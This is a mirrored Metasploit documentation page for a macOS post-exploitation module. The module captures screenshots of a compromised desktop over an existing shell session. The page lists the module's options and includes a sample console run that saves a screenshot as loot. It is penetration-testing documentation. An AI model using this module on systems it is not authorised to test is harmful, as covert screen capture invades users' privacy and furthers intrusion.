CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/post/osx/capture/screen.md
Views: 11789

Vulnerable Application

This module takes screenshots of target desktop and automatically downloads them.

Verification Steps

  1. Start msfconsole

  2. Get a shell, user level is fine

  3. Do: use post/osx/capture/screen

  4. Do: set session #

  5. Do: run

  6. You should have a screenshot saved to loot

Options

COUNT The number of screenshots to collect. Default is 1.

DELAY Interval between screenshots in seconds. 0 for no delay. Default is 10.

EXE_PATH Path to remote screencapture executable. Default is /usr/sbin/screencapture

FILETYPE File format to use when saving a snapshot (Accepted: png, gif). Default is png.

TMP_PATH Path to remote temp directory. Default is /tmp/<random>

Scenarios

User level shell on OSX 10.14.4

msf5 post(osx/capture/keylog_recorder) > use post/osx/capture/screen 
msf5 post(osx/capture/screen) > set session 1
session => 1
msf5 post(osx/capture/screen) > run

[*] Capturing 1 screenshots with a delay of 10 seconds
[*] Screen Capturing Complete
[*] Use "loot -t screen_capture.screenshot" to see file locations of your newly acquired loot
[*] Post module execution completed
msf5 post(osx/capture/screen) > loot -t screen_capture.screenshot

Loot
====

host           service  type                       name              content     info        path
----           -------  ----                       ----              -------     ----        ----
222.222.2.222           screen_capture.screenshot  screenshot.0.png  image/png   Screenshot  /loot/20190414205923_default_222.222.2.222_screen_capture.s_194117.png